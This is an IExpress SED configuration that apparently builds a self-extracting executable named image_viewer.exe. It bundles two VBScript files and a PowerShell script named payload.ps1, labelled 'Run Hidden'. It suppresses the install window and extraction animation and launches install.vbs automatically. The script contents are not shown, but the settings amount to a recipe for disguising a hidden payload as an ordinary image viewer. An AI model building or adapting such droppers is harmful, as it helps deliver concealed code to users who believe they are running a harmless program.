[Version]
Class=IEXPRESS
SEDVersion=3
[Options]
PackagePurpose=InstallApp
ShowInstallProgramWindow=0
HideExtractAnimation=1
UseLongFileName=0
InsideCompressed=0
CAB_FixedSize=0
CAB_ResvCodeSigning=0
RebootMode=I
InstallPrompt=%InstallPrompt%
DisplayLicense=%DisplayLicense%
FinishMessage=%FinishMessage%
TargetName=%TargetName%
FriendlyName=%FriendlyName%
AppLaunched=%AppLaunched%
PostInstallCmd=%PostInstallCmd%
AdminQuietInstCmd=%AdminQuietInstCmd%
UserQuietInstCmd=%UserQuietInstCmd%
SourceFiles=SourceFiles
[Strings]
InstallPrompt=
DisplayLicense=
FinishMessage=
TargetName=C:\Users\Admin\Desktop\AI\image_viewer.exe
FriendlyName= Run Hidden
AppLaunched=install.vbs 
PostInstallCmd=<None>
AdminQuietInstCmd=
UserQuietInstCmd=
FILE0="auto.vbs"
FILE1="install.vbs"
FILE2="payload.ps1"
[SourceFiles]
SourceFiles0=C:\Users\Admin\Desktop\AI\
[SourceFiles0]
%FILE0%=
%FILE1%=
%FILE2%=
